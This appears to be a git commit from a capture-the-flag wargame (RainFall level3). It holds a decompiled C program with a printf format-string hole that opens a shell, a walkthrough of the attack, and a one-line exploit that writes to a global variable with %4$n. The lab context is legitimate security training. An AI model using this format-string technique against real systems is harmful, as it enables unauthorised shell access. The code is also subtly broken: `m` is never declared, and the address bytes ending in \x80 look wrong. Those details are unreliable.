level3 done

.gitignore

@@ -2,3 +2,4 @@ RainFall.iso
 rainfall*
 level*/level*
 passwd
+sample

level3/ressources/exploit

@@ -0,0 +1 @@
+(python -c 'print "\x8c\x98\x04\x80" + "A"*60 + "%4$n"'; cat) | ./level3

level3/source.c

@@ -0,0 +1,21 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void v(void)
+{
+	char buf[520];
+
+	fgets(buf, 512, stdin);
+	printf(buf);
+	if (m == 64) {
+		fwrite("Wait what?!\n", 1, 0xc, stdout);
+		system("/bin/sh");
+	}
+	return;
+}
+
+int main(void)
+{
+	v();
+	return 0;
+}

level3/walkthrough

@@ -0,0 +1,16 @@
+# Level3
+
+Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`.
+This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables).
+We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`.
+Our goal here will be to change the value of this variable in order to get the password.
+
+To do so, we will first dump the stack to know where the buffer is located. 
+Let's print something basic like `print("AAAA" + "%x"*10)`. We can see that 0x41414141 (= "AAAA") is printed at the 4th position in the stack.
+Now that we know where our buffer is located on the stack, let's exploit printf.
+
+By using the `%n` flag, we can change the value of a variable to the length of what's been printed before (here, `m == 64`).
+Since we cannot pass arguments to printf directly, we need to specify the position in the stack of the variable we want `%n` to print to. This is achieved by writing `m`'s address (obtained through gdb, static address since ASLR is disabled) at the beginning of the buffer.
+Finally, we print the 60 (+ 4 bytes for the address have already been printed) so that `m == 64`.
+Here is the command:
+`(python -c 'print "\x8c\x98\x04\x80" + "A"*60 + "%4$n"'; cat) | ./level3`